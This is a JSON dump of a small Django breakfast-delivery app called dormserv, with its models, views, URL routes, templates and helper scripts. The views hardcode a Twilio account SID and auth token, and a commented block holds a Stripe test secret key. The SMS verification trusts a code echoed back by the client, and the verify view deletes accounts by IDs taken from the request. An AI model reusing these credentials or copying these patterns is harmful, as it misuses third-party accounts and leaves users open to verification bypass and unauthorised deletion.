view_date(self):\n\t\treturn self.date.strftime(\"%m/%d\")\n\n\tdef is_active(self):\n\t\tif self.deliveries_avail > 0:\n\t\t\treturn True\n\t\treturn False\n\n\tdef week_day(self):\n\t\tiso = self.date.isocalendar()\n\t\treturn iso[2]\n\n\tdef display_time(self):\n\t\tt = self.start_time.strftime(\"%I:%M\")\n\t\tif t[0] == \"0\":\n\t\t\treturn t[1:] + \" am\"\n\t\treturn t + \" am\"\n\n\tdef week_num(self):\n\t\tiso = self.date.isocalendar()\n\t\treturn iso[1]\n\n\tdef __unicode__(self):\n\t\treturn str(self.start_time) + \" \" + str(self.date)\n\n\tdef increase_demand_counter(self):\n\t\tself.demand_counter = self.demand_counter + 1\n\n\tdef decrease_deliveries_avail(self):\n\t\tself.deliveries_avail = self.deliveries_avail - 1\n\n\t\n\t#each order mapped to a certain array of food items\n\nclass Item(models.Model):\n\tEGGS = 'EGG'\n\tCOFFEE = 'COF'\n\tFRUITS = 'FRU'\n\tOATS = 'OAT'\n\tYOGURT = 'YOG'\n\tBAKERY = 'BAK'\n\tITEM_CATEGORIES = (\n\t\t(EGGS, 'EGG'),\n\t\t(COFFEE, 'COF'),\n\t\t(FRUITS, 'FRU'),\n\t\t(OATS, 'OAT'),\n\t\t(YOGURT, 'YOG'),\n\t\t(BAKERY, 'BAK'),\n\t\t)\n\titem_name = models.CharField(max_length = 80)\n\titem_price = models.FloatField(max_length = 5)\n\titem_description = models.TextField(max_length=200)\n\titem_category = models.CharField(max_length=3, choices=ITEM_CATEGORIES)\n\twanted = models.BooleanField()\n\n\tdef price_format_usd(self):\n\t\tstr_price_raw = str(self.item_price)\n\t\tprice_list = str_price_raw.split(\".\")\n\t\tdollars = price_list[0]\n\t\tcents = price_list[1]\n\t\tif len(cents) == 1:\n\t\t\tcents = cents + \"0\"\n\t\treturn dollars + \".\" + cents\n\n\n\tdef __unicode__(self):\n\t\treturn self.item_name\n\n\nclass Order(models.Model):\n\tuser = models.ForeignKey(UserProfile)\n\ttime = models.TimeField(auto_now=True)\n\tdate = models.DateField(auto_now=True)\n\ttotal_price = models.FloatField(max_length=30, default=0.0)\n\n\tdef __unicode__(self):\n\t\treturn self.id"
},
{
"alpha_fraction": 0.6272384524345398,
"alphanum_fraction": 0.6382343769073486,
"avg_line_length": 40.324676513671875,
"blob_id": "141c9f9523a62772378332e43440916e1dca3833",
"content_id": "763ad39f755b4110acad6476080da4f78ceecdeb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6366,
"license_type": "no_license",
"max_line_length": 211,
"num_lines": 154,
"path": "/users/views.py",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom users.models import User, UserProfile\nfrom users.forms import UserForm, UserProfileForm\nfrom django.template import RequestContext\nfrom django.shortcuts import render_to_response, redirect\nfrom users.forms import UserForm, UserProfileForm\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth import logout\nfrom django.contrib.auth.decorators import login_required\nfrom random import randint\nfrom twilio.rest import TwilioRestClient\n\ndef register(request):\n # Like before, get the request's context.\n context = RequestContext(request)\n\n # A boolean value for telling the template whether the registration was successful.\n # Set to False initially. Code changes value to True when registration succeeds.\n registered = False\n\n # If it's a HTTP POST, we're interested in processing form data.\n if request.method == 'POST':\n # Attempt to grab information from the raw form information.\n # Note that we make use of both UserForm and UserProfileForm.\n user_form = UserForm(data=request.POST)\n profile_form = UserProfileForm(data=request.POST)\n\n # If the two forms are valid...\n if user_form.is_valid() and profile_form.is_valid():\n \n # Save the user's form data to the database.\n user = user_form.save()\n\n # Now we hash the password with the set_password method.\n # Once hashed, we can update the user object.\n user.set_password(user.password)\n\n user.save()\n\n # Now sort out the UserProfile instance.\n # Since we need to set the user attribute ourselves, we set commit=False.\n # This delays saving the model until we're ready to avoid integrity problems.\n profile = profile_form.save(commit=False)\n profile.user = user\n print profile\n # Now we save the UserProfile model instance.\n profile.save()\n r0 = randint(0, 9)\n r1 = randint(0, 9)\n r2 = randint(0, 9)\n r3 = randint(0, 9)\n str_sec = str(r0)+str(r1)+str(r2)+str(r3)\n\n account_sid = \"ACd2d6a002416aad11df6d7b3d529506b2\"\n auth_token = \"616085bee1e2c14db70339a86bfa9dda\"\n client = TwilioRestClient(account_sid, auth_token)\n message = client.sms.messages.create(body=user.first_name + \", thanks for signing up for Dormserv! Your code is \" + str_sec, to= profile.phone, from_=\"+19146185355\") # Replace with your Twilio number\n registered = True\n return render_to_response('confirm_account.html',\n {'profile': profile.id, 'user':profile.user.id, 'str_sec':str_sec},\n context)\n\n # Invalid form or forms - mistakes or something else?\n # Print problems to the terminal.\n # They'll also be shown to the user.\n else:\n print user_form.errors, profile_form.errors\n\n # Not a HTTP POST, so we render our form using two ModelForm instances.\n # These forms will be blank, ready for user input.\n else:\n user_form = UserForm()\n profile_form = UserProfileForm()\n\n # Render the template depending on the context.\n return render_to_response(\n 'register.html',\n {'user_form': user_form, 'profile_form': profile_form, 'registered': registered},\n context)\n\ndef user_login(request):\n # Like before, obtain the context for the user's request.\n context = RequestContext(request)\n cur_usr = request.user\n if cur_usr.is_active:\n return redirect('http://127.0.0.1:8000/cal', user=cur_usr)\n\n # If the request is a HTTP POST, try to pull out the relevant information.\n if request.method == 'POST':\n # Gather the username and password provided by the user.\n # This information is obtained from the login form.\n username = request.POST['username']\n password = request.POST['password']\n\n user = authenticate(username=username, password=password)\n\n # If we have a User object, the details are correct.\n # If None (Python's way of representing the absence of a value), no user\n # with matching credentials was found.\n if user is not None:\n # Is the account active? It could have been disabled.\n if user.is_active:\n # If the account is valid and active, we can log the user in.\n # We'll send the user back to the homepage.\n login(request, user)\n print user\n\n return redirect('http://127.0.0.1:8000/cal', user=user)\n\n #return render_to_response('welcome.html', {'user' : user}, context)\n else:\n # An inactive account was used - no logging in!\n return HttpResponse(\"Your account is disabled.\")\n else:\n # Bad login details were provided. So we can't log the user in.\n #print \"Invalid login details: {0}, {1}\".format(username, password)\n return HttpResponse(\"Invalid login details supplied.\")\n\n # The request is not a HTTP POST, so display the login form.\n # This scenario would most likely be a HTTP GET.\n else:\n # No context variables to pass to the template system, hence the\n # blank dictionary object...\n return render_to_response('login.html', {}, context)\n\ndef verify_user_text(request):\n context = RequestContext(request)\n\n if request.method == 'POST':\n str_sec=request.POST.get('str_sec')\n secret_code=request.POST.get('secret_code')\n profile=request.POST.get('profile')\n user=request.POST.get('user')\n if secret_code == str_sec:\n return render_to_response('login_form.html', {}, context)\n else:\n UserProfile.objects.get(id=profile).delete()\n User.objects.get(id=user).delete()\n return render_to_response(\"register_2.html\", {}, context)\n return HttpResponse(\"error....\")\n\n\n\ndef thanks(request):\n\treturn HttpResponse(\"Thank you for registering!\")\n\t\n@login_required\ndef user_logout(request):\n # Since we know the user is logged in, we can now just log them out.\n logout(request)\n\n # Take the user back to the homepage.\n return HttpResponseRedirect('/')\n\n\n"
},
{
"alpha_fraction": 0.6767169237136841,
"alphanum_fraction": 0.6767169237136841,
"avg_line_length": 48.75,
"blob_id": "7bb99e55c309ca5403a7207d3efd6801bd867b9e",
"content_id": "e447bfcffa3247eae9e4855e4c2814e613be6b5d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 597,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 12,
"path": "/users/urls.py",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import patterns, url\nfrom users import views\n\nurlpatterns = patterns('',\n\turl(r'^$', views.user_login, name='login'),\n url(r'^register', views.register, name='register'), # ADD NEW PATTERN!\n\turl(r'^login/$', views.user_login, name='login'), # ADD NEW PATTERN!\n\turl(r'^logout/$', views.user_logout, name='logout'), # ADD NEW PATTERN!\n\turl(r'^register/thanks/$', views.thanks, name='thanks'), # ADD NEW PATTERN!\n\turl(r'^register/welcome/$', views.thanks, name='thanks'), # ADD NEW PATTERN!\n\turl(r'^verify_user_text/', views.verify_user_text, name='verify_user_text'),\n )\n"
},
{
"alpha_fraction": 0.733558177947998,
"alphanum_fraction": 0.733558177947998,
"avg_line_length": 28.649999618530273,
"blob_id": "5f2e8043dc5a3cddaaf8d892aa329f36e7a59f08",
"content_id": "9bfc83c02e5fa695b93d3fb48597f84a2400916a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 593,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 20,
"path": "/cal/admin.py",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom cal.models import Entry, Item, Order\n\nclass EntryAdmin(admin.ModelAdmin):\n\tlist_display = ('start_time', 'date','deliveries_avail', 'demand_counter', 'is_active', 'week_num', 'week_day',)\n\nclass ItemAdmin(admin.ModelAdmin):\n\tlist_display = ('item_name', 'item_price', 'item_category')\n\nclass OrderInline(admin.StackedInline):\n model = Order\n\nclass OrderAdmin(admin.ModelAdmin):\n\tlist_display = ('user', 'date', 'time', 'total_price')\n\nadmin.site.register(Entry, EntryAdmin)\n\nadmin.site.register(Item, ItemAdmin)\n\nadmin.site.register(Order, OrderAdmin)\n"
},
{
"alpha_fraction": 0.5175644159317017,
"alphanum_fraction": 0.578454315662384,
"avg_line_length": 33.20000076293945,
"blob_id": "2251246a31b98fb144740719183fe633314ac399",
"content_id": "08c6568495e214d2d4d622081f3800a9b1d14335",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 854,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 25,
"path": "/dormserv/create_week.py",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "from cal.models import Entry\nfrom datetime import date, time, timedelta\nimport datetime\n\n\ndef handle(year, month, day, def_orders):\n start_date = datetime.date(year, month, day)\n list_of_dates = []\n for i in range(0,7):\n k = start_date + datetime.timedelta(days=i)\n list_of_dates.append(k)\n list_of_times = []\n deliv_times = [(7,45),(8,00),(8,15),(8,30),(8,45),(9,00),(9,15),(9,30),(9,45),(10,00),(10,15),(10,30)]\n for time in deliv_times:\n k = datetime.time(time[0], time[1])\n list_of_times.append(k)\n for d in list_of_dates:\n for t in list_of_times:\n e = Entry(start_time=t, date=d, deliveries_avail=def_orders)\n e.save()\n date_str = str(year) + \"-\" + str(month) + \"-\" + str(date)\n print \"Successfully populated\"\n\nif __name__ == \"__main__\":\n handle(2014, 01, 27, 4)"
},
{
"alpha_fraction": 0.6725944876670837,
"alphanum_fraction": 0.6833915710449219,
"avg_line_length": 30.96954345703125,
"blob_id": "8f73965656475d74f1be724cb62ca257b9be7484",
"content_id": "4f6db43e9a6ab299ea8dc52139404e411c43ae59",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6298,
"license_type": "no_license",
"max_line_length": 271,
"num_lines": 197,
"path": "/cal/views.py",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render, get_object_or_404\nfrom django.shortcuts import render_to_response\nfrom cal.models import Entry, Item, Order\nfrom users.models import UserProfile\nfrom forms import ItemForm\nfrom django.utils import timezone\nimport datetime\nfrom datetime import date, time\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth import logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.template import RequestContext\nfrom twilio.rest import TwilioRestClient\nimport stripe\nfrom random import randint\n\n# Create your views here.\n\n@login_required\ndef display_calendar(request):\n\tcontext = RequestContext(request)\n\tcurrent_week = datetime.datetime.now().isocalendar()[1]+1\n\tworkables = []\n\n\tfor delivery in Entry.objects.all():\n\t\tif delivery.week_num() == current_week:\n\t\t\tworkables.append(delivery)\n\n\tmon = []\n\ttue = []\n\twed = []\n\tthurs = []\n\tfri = []\n\tsat = []\n\tsun = []\n\tm_date = \"\"\n\tt_date = \"\"\n\tw_date = \"\"\n\tth_date = \"\"\n\tf_date = \"\"\n\ts_date = \"\"\n\tsu_date = \"\"\n\n\tcurrent_user = request.user\n\tprint current_user\n\tfor delivery in workables:\n\n\t\tif delivery.week_day() == 1:\n\t\t\tmon.append(delivery)\n\t\t\tk = delivery.date.strftime(\"%m/%d\")\n\t\t\tm_date = k\n\t\tif delivery.week_day() == 2:\n\t\t\ttue.append(delivery)\n\t\t\tk = delivery.date.strftime(\"%m/%d\")\n\t\t\tt_date = k\n\t\tif delivery.week_day() == 3:\n\t\t\twed.append(delivery)\n\t\t\tk = delivery.date.strftime(\"%m/%d\")\n\t\t\tw_date = k\n\t\tif delivery.week_day() == 4:\n\t\t\tthurs.append(delivery)\n\t\t\tk = delivery.date.strftime(\"%m/%d\")\n\t\t\tth_date = k\t\t\n\t\tif delivery.week_day() == 5:\n\t\t\tfri.append(delivery)\n\t\t\tk = delivery.date.strftime(\"%m/%d\")\n\t\t\tf_date = k\t\t\n\t\tif delivery.week_day() == 6:\n\t\t\tsat.append(delivery)\n\t\t\tk = delivery.date.strftime(\"%m/%d\")\n\t\t\ts_date = k\t\t\n\t\tif delivery.week_day() == 7:\n\t\t\tsun.append(delivery)\n\t\t\tk = delivery.date.strftime(\"%m/%d\")\n\t\t\tsu_date = k\t\n\tdate_tuple = (m_date, t_date, w_date, th_date, f_date, s_date, su_date)\n\treturn render_to_response(\n 'calendar.html',\n {'mon': mon, 'tue': tue, 'wed': wed, 'thurs' : thurs, 'fri': fri, 'sat': sat, 'sun': sun, 'current_user':current_user, 'date_tuple':date_tuple},\n context)\n\n\n@login_required\ndef detail(request, entry_id):\n\tcontext = RequestContext(request)\n\tentry = get_object_or_404(Entry, pk=entry_id)\n\tcurrent_entry = Entry.objects.get(id=entry_id)\n\tcurrent_user = request.user\n\tif request.method == 'POST': \n \t\titems=request.POST.getlist('item_list')\n \t\tpurchase_price = 0.0\n \t\titems_to_verify = []\n \t\tthis_user = UserProfile.objects.get(id=1)\n \t\t#create the order instance\n \t\tfor i in items:\n \t\t\tk = Item.objects.get(id=i)\n \t\t\titems_to_verify.append(k)\n \t\t\tpurchase_price = purchase_price + k.item_price\n \t\t\t\n\n \t\tptp = str(purchase_price*100+250)[:-2]\n \t\tprice_to_pass = ptp[:-2]+\".\"+ptp[-2:]\n \t\tstripe_format_str_price = ptp[:-2]+ptp[-2:]\n\n \t\torder = Order(user=this_user, total_price=purchase_price)\n \t\torder.save()\n \t\tprint str(order.total_price)\n\t\treturn render_to_response('confirm.html', {'price_to_pass': price_to_pass, 'items_to_verify':items_to_verify, 'current_user':current_user, 'this_user':this_user, 'current_entry':current_entry, 'order': order, 'stripe_format_str_price':stripe_format_str_price}, context)\n\n\teggs = []\n\tcoffee = []\n\toats = []\n\tbakery = []\n\tfruit = []\n\tyogurt = []\n\n\titem_list = []\n\tfor item in Item.objects.all():\n\t\titem_list.append(item)\n\t\tif item.item_category == \"EGG\":\n\t\t\teggs.append(item)\n\t\tif item.item_category == \"COF\":\n\t\t\tcoffee.append(item)\n\t\tif item.item_category == \"FRU\":\n\t\t\tfruit.append(item)\n\t\tif item.item_category == \"BAK\":\n\t\t\tbakery.append(item)\n\t\tif item.item_category == \"OAT\":\n\t\t\toats.append(item)\n\t\tif item.item_category == \"YOG\":\n\t\t\tyogurt.append(item)\n\n\tif current_entry.deliveries_avail == 0:\n\t\treturn HttpResponse(\"No more deliveries avail at this time!\")\n\n\treturn render_to_response(\n\t\t'menu.html', \n\t\t{'item_list':item_list, 'current_user':current_user, 'current_entry':current_entry, 'eggs':eggs, 'coffee':coffee, 'oats':oats, 'bakery':bakery, 'fruit':fruit, 'yogurt':yogurt,}, \n\t\tcontext)\n\n@login_required\ndef profile(request):\n\tcontext = RequestContext(request)\n\tcurrent_user = request.user\n\treturn render_to_response('profile.html', {'current_user':current_user,}, context)\n\n@login_required\ndef validate_purchase(request, entry_id):\n\tcontext = RequestContext(request)\n\tcurrent_entry = Entry.objects.get(id=entry_id)\n\tcurrent_user = request.user\n\tif current_entry.deliveries_avail == 0:\n\t\treturn HttpResponse(\"No more deliveries avail at this time!\")\n\t'''\n\t# Set your secret key: remember to change this to your live secret key in production\n\t# See your keys here https://manage.stripe.com/account\n\tstripe.api_key = \"sk_test_4qn67c9y4axf9qYUKtg8JSa9\"\n\n\t# Get the credit card details submitted by the form\n\ttoken = request.POST.get('stripeToken')\n\n\t# Create the charge on Stripe's servers - this will charge the user's card\n\ttry:\n\t charge = stripe.Charge.create(\n\t amount=1000, # amount in cents, again\n\t currency=\"usd\",\n\t card=token,\n\t description=\"[email protected]\"\n\t )\n\texcept stripe.CardError, e:\n\t # The card has been declined\n\t pass\n\t'''\n\t#print current_entry.deliveries_avail\n\tcurrent_entry.decrease_deliveries_avail()\n\tcurrent_entry.save()\n\t#print current_entry.deliveries_avail\n\tthis_user = UserProfile.objects.get(id=(current_user.id-1))\n\taccount_sid = \"ACd2d6a002416aad11df6d7b3d529506b2\"\n\tauth_token = \"616085bee1e2c14db70339a86bfa9dda\"\n\tclient = TwilioRestClient(account_sid, auth_token)\n\tmessage = client.sms.messages.create(body=this_user.user.first_name + \", thanks for your order to be delivered at \" + current_entry.display_time() + \" from Dormserv!\", to= this_user.phone, from_=\"+19146185355\") # Replace with your Twilio number\n\t#print message.sid\n\n\tlist_of_greetings = [\"It's that easy.\", \"All done.\", \"Thanks for your order.\", \"Isn't this the best?\", \"That's breakfast done right.\", \"Isn't this the best thing since the C-1 Express?\"]\n\tgreeting_to_return = \"\"\n\tr = randint(0,len(list_of_greetings)-1)\n\tfor n in range(len(list_of_greetings)):\n\t\tif r == n:\n\t\t\tgreeting_to_return = list_of_greetings[n]\n\n\treturn render_to_response(\n\t\t'thanks.html', \n\t\t{'greeting_to_return':greeting_to_return, 'current_user':current_user}, \n\t\tcontext)\n"
},
{
"alpha_fraction": 0.3457481861114502,
"alphanum_fraction": 0.35234013199806213,
"avg_line_length": 39.459999084472656,
"blob_id": "c837871aa31ef552768809fce636e79c671d14d0",
"content_id": "1744bf9afb381dd8dcf6c0a474e56fe2685e566f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 6068,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 150,
"path": "/dormserv/cal/templates/calendar.html",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\n\n{% load staticfiles %}\n<link rel=\"stylesheet\" type=\"text/css\" href=\"{% static 'cal/css/dormserv.css' %}\"/>\n<link rel=\"stylesheet\" type=\"text/css\" href=\"{% static 'cal/css/bootstrap.css' %}\"/>\n\n\n<html>\n <head>\n <title>Dormserv Calendar</title>\n </head>\n\n {% include 'head.html' %}\n \n <div id=\"wrap\">\n <!--\n <div id=\"nav\">\n <a href=\"/\">\n <div class=\"imagewrapper\">\n <img src=\"{% static \"cal/images/12.png\" %}\" alt=\"dormserv\"/>\n </div>\n </a>\n </div>\n !-->\n\n <body>\n {% csrf_token %}\n\n {% if user.is_authenticated %}\n {% else %}\n <a href=\"/register/\">Register Here</a><br />\n <a href=\"/login/\">Login</a><br />\n {% endif %}\n\n <div class=\"progress\">\n <div class=\"progress-bar\" role=\"progressbar\" aria-valuenow=\"25\" aria-valuemin=\"0\" aria-valuemax=\"100\" style=\"width: 25%;\">\n <span class=\"sr-only\">25% Complete</span>\n </div>\n </div>\n\n\n <div id = \"cal_head\">\n <div id = \"cal_head_top\">\n <h1>Morning, {{ current_user.first_name }}.</h1>\n </div>\n <div id = \"cal_head_bottom\">\n <h2>When do you want your breakfast?</h2>\n </div>\n </div>\n\n <table border='1' cellspacing='2' cellpadding='1'>\n <tr>\n <td><center><p><h5><b>Monday, {{ date_tuple.0 }}</b></h5></p></center></td>\n <td><center><p><h5><b>Tuesday, {{ date_tuple.1 }}</b></h5></p></center></td>\n <td><center><p><h5><b>Wednesday, {{ date_tuple.2 }}</b></h5></p></center></td>\n <td><center><p><h5><b>Thursday, {{ date_tuple.3 }}</b></h5></p></center></td>\n <td><center><p><h5><b>Friday, {{ date_tuple.4 }}</b></h5></p></center></td>\n <td><center><p><h5><b>Saturday, {{ date_tuple.5 }}</b></h5></p></center></td>\n <td><center><p><h5><b>Sunday, {{ date_tuple.6 }}</b></h5></p></center></td>\n </tr>\n <tr>\n <tr>\n <td>\n {% for deliv in mon %}\n <br>\n <div id = \"deliv_slot\">\n {% if deliv.is_active %}\n <center><a href=\"{{ deliv.id }}\">{{ deliv.display_time }} - {{ deliv.fifteen_over }}</a></center>\n {% else %}\n <center>{{ deliv.display_time }}- {{ deliv.fifteen_over }}</center>\n {% endif %}\n </div>\n {% endfor %}\n </td>\n <td>\n {% for deliv in tue %}\n <br>\n <div id = \"deliv_slot\">\n {% if deliv.is_active %}\n <center><a href=\"{{ deliv.id }}\">{{ deliv.display_time }} - {{ deliv.fifteen_over }} </a></center>\n {% else %}\n <center>{{ deliv.display_time }} - {{ deliv.fifteen_over }}</center>\n {% endif %}\n </div>\n {% endfor %}\n </td>\n <td>\n {% for deliv in wed %}\n <br>\n <div id = \"deliv_slot\">\n {% if deliv.is_active %}\n <center><a href=\"{{ deliv.id }}\">{{ deliv.display_time }} - {{ deliv.fifteen_over }}</a></center>\n {% else %}\n <center>{{ deliv.display_time }} - {{ deliv.fifteen_over }}</center>\n {% endif %}\n </div>\n {% endfor %}\n </td>\n <td>\n {% for deliv in thurs %}\n <br>\n <div id = \"deliv_slot\">\n {% if deliv.is_active %}\n <center><a href=\"{{ deliv.id }}\">{{ deliv.display_time }} - {{ deliv.fifteen_over }}</a></center>\n {% else %}\n <center>{{ deliv.display_time }} - {{ deliv.fifteen_over }}</center>\n {% endif %}\n </div>\n {% endfor %}\n </td>\n <td>\n {% for deliv in fri %}\n <br>\n <div id = \"deliv_slot\">\n {% if deliv.is_active %}\n <center><a href=\"{{ deliv.id }}\">{{ deliv.display_time }} - {{ deliv.fifteen_over }}</a></center>\n {% else %}\n <center>{{ deliv.display_time }} - {{ deliv.fifteen_over }}</center>\n {% endif %}\n </div>\n {% endfor %}\n </td>\n <td>\n {% for deliv in sat %}\n <br>\n <div id = \"deliv_slot\">\n {% if deliv.is_active %}\n <center><a href=\"{{ deliv.id }}\">{{ deliv.display_time }} - {{ deliv.fifteen_over }}</a></center>\n {% else %}\n <center>{{ deliv.display_time }} - {{ deliv.fifteen_over }}</center>\n {% endif %}\n </div>\n {% endfor %}\n </td>\n <td>\n {% for deliv in sun %}\n <br>\n <div id = \"deliv_slot\">\n {% if deliv.is_active %}\n <center><a href=\"{{ deliv.id }}\">{{ deliv.display_time }} - {{ deliv.fifteen_over }}</a></center>\n {% else %}\n <center>{{ deliv.display_time }} - {{ deliv.fifteen_over }}</center>\n {% endif %}\n </div>\n {% endfor %}\n </td>\n </table>\n </div>\n </body>\n</html>"
},
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 34,
"blob_id": "02a4c932162f63aa1cd2a1ecee9eb1abf5796d5b",
"content_id": "00e0d43a1f2dab30600f32d8153c3e773b4eaa0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 35,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 1,
"path": "/README.md",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "This is the dormserv project code.\n"
},
{
"alpha_fraction": 0.6780045628547668,
"alphanum_fraction": 0.680272102355957,
"avg_line_length": 43.20000076293945,
"blob_id": "f3bd9a3866026ba2c0e495b170c155f8cf478869",
"content_id": "eec80e507228aadd7be360d0c5d5814aa59cf667",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 441,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 10,
"path": "/cal/urls.py",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import patterns, url\nfrom cal import views\n\nurlpatterns = patterns('',\n\turl(r'^$', views.display_calendar, name='display_calendar'),\n\turl(r'^(?P<entry_id>\\d+)/$', views.detail, name='detail'),\n\turl(r'^(?P<entry_id>\\d+)/detail/validate_purchase', views.validate_purchase, name='validate_purchase'),\n\turl(r'^(?P<entry_id>\\d+)/detail', views.detail, name='detail2'),\n\turl(r'^profile', views.profile, name='profile'),\n )"
},
{
"alpha_fraction": 0.5563380122184753,
"alphanum_fraction": 0.5610328912734985,
"avg_line_length": 19.33333396911621,
"blob_id": "3316de3c2603d686f3f70f882a7ca2f595d7510a",
"content_id": "0f73962c789ca639e0257205e2245757bbcb89d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 426,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 21,
"path": "/cal/templates/profile.html",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\n\n{% load staticfiles %}\n<link rel=\"stylesheet\" type=\"text/css\" href=\"{% static 'cal/css/dormserv.css' %}\"/>\n<link rel=\"stylesheet\" type=\"text/css\" href=\"{% static 'cal/css/bootstrap.css' %}\"/>\n\n\n<html>\n <head>\n <title>My Profile</title>\n </head>\n {% include 'head.html' %}\n\n <body>\n \t<div id=\"wrap\">\n \t\t<h1>{{ current_user.first_name }}'s Profile</h1>\n \t</div>\n\n \t</body>\n\n</html>"
},
{
"alpha_fraction": 0.649350643157959,
"alphanum_fraction": 0.649350643157959,
"avg_line_length": 16.846153259277344,
"blob_id": "fe1a76aeab1da2d0f3573e54220d441470b1f14d",
"content_id": "2f96b5e50928927777785a7503f8d1b62dd128af",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 231,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 13,
"path": "/dormserv/delete_all_on_cal.py",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "from cal.models import Entry\nfrom datetime import date, time, timedelta\nimport datetime\n\n\ndef handle():\n for e in Entry.objects.all():\n e.delete()\n\n print \"Successfully deleted\"\n\nif __name__ == \"__main__\":\n handle()"
},
{
"alpha_fraction": 0.7479674816131592,
"alphanum_fraction": 0.7479674816131592,
"avg_line_length": 19.5,
"blob_id": "0fc01b44d9ce1a7ab2c4c9808bd65abc40ede7fa",
"content_id": "7c9f999e506b0628b8de2a817b7f365106b4b7af",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 123,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 6,
"path": "/dormserv/cal/forms.py",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "from django import forms\nfrom cal.models import Item\n\nclass ItemForm(forms.ModelForm):\n\tclass Meta:\n\t\tfields = ('wanted',)\n"
},
{
"alpha_fraction": 0.6267049312591553,
"alphanum_fraction": 0.6302943229675293,
"avg_line_length": 21.126983642578125,
"blob_id": "f92e5ff2c71015a93c33083055a93541af880a1a",
"content_id": "bf598f87b86ed48723597534daf83304ba2a55c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1393,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 63,
"path": "/users/models.py",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.contrib.auth.models import User\n\nclass UserProfile(models.Model):\n\tALSPLAUGH = 'ALS'\n\tBASSETT = 'BAS'\n\tBROWN = 'BRO'\n\tPEGRAM = 'PEG'\n\tAYCOCK = 'AYC'\n\tEPWORTH = 'EPW'\n\tGILES = 'GIL'\n\tJARVIS = 'JAR'\n\tWILSON = 'WIL'\n\tGILBERT_ADDOMS = 'GAD'\n\tSOUTHGATE = 'SOU'\n\tBELL_TOWER = 'BTW'\n\tBLACKWELL = 'BLA'\n\tRANDOLPH = 'RAN'\n\tCRAVEN = 'CRA'\n\tCROWELL = 'CRO'\n\tWANNAMAKER = 'WAN'\n\tEDENS = 'EDE'\n\tFEW = 'FEW'\n\tKEOHANE = 'KEO'\n\tKILGO = 'KIL'\n\tEAST = 'EAS'\n\tCENTRAL = 'CEN'\n\tBLANK = ' '\n\tQUAD_CHOICES = (\n\t\t(BLANK, 'Choose a quad...'),\n\t\t(CENTRAL, 'Central Campus'),\n\t\t(ALSPLAUGH, 'Alsplaugh'),\n\t\t(AYCOCK, 'Aycock'),\n\t\t(BASSETT, 'Bassett'),\n\t\t(BELL_TOWER, 'Bell Tower'),\n\t\t(BLACKWELL, 'Blackwell'),\n\t\t(BROWN, 'Brown'),\n\t\t(CRAVEN, 'Craven'),\n\t\t(CROWELL, 'Crowell'),\n\t\t(EDENS, 'Edens'),\n\t\t(EPWORTH, 'Epworth'),\n\t\t(FEW, 'Few'),\n\t\t(GILBERT_ADDOMS, 'Gilbert-Addoms'),\n\t\t(GILES, 'Giles'),\n\t\t(JARVIS, 'Jarvis'),\n\t\t(KEOHANE, 'Keohane'),\n\t\t(KILGO, 'Kilgo'),\n\t\t(PEGRAM, 'Pegram'),\n\t\t(RANDOLPH, 'Randolph'),\n\t\t(SOUTHGATE, 'Southgate'),\n\t\t(WANNAMAKER, 'Wannamaker'),\n\t\t(WILSON, 'Wilson'),\n\t)\n\tuser = models.OneToOneField(User)\n\tdorm = models.CharField(max_length=3, choices=QUAD_CHOICES, default=BLANK)\n\tsection = models.CharField(max_length=2)\n\troom = models.CharField(max_length=7)\n\tphone = models.CharField(max_length=20)\n\n\n\n\tdef __unicode__(self):\n\t\treturn self.user.username"
}
] | 14 |
HarryKodden/oidc-lab
|
https://github.com/HarryKodden/oidc-lab
|
